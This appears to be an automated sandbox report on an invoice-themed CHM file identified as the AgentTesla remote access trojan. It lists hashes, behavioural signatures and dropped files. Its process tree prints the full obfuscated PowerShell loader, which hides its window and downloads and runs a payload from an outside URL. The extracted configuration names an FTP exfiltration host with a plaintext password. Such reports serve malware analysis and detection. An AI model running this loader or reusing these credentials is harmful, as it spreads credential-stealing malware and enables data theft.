Analysis
-
max time kernel
96s -
max time network
115s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
12/04/2023, 06:55
General
-
Target
FACTURE_.chm
-
Size
15KB
-
MD5
7074f8f5a3355c9bddec17025f30ec72
-
SHA1
801809828ef905fe29f8f96f9633c38d2749a438
-
SHA256
b418af4dc3b0cc92eb25863dc3525421d3ae4c358150e94728d51837443fd65f
-
SHA512
c86b657207cc5c117c4932cad722c27203762162afa48d1cb9d741135c25f7642bad54c2af0875d2e4c8134d0fc5d79456ed61607b6738c5a1b790e1c4a75719
-
SSDEEP
192:W87fDT/i1gtElXYSRQyBRobaycV8rRqiDjYX:WcXa1gtWXYSRQ4cayVleX
Malware Config
Extracted
https://linado.lt/J7.jpg
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.kamen.si - Port:
21 - Username:
[email protected] - Password:
Motherland23@
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 13 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\FACTURE_.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://linado.lt/J7.jpg')|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
192KB
-
Filesize
5.6MB
-
Filesize
64KB
-
Filesize
1.8MB
-
Filesize
320KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
408KB
-
Filesize
164KB
-
Filesize
92KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
1.3MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
92KB
-
Filesize
92KB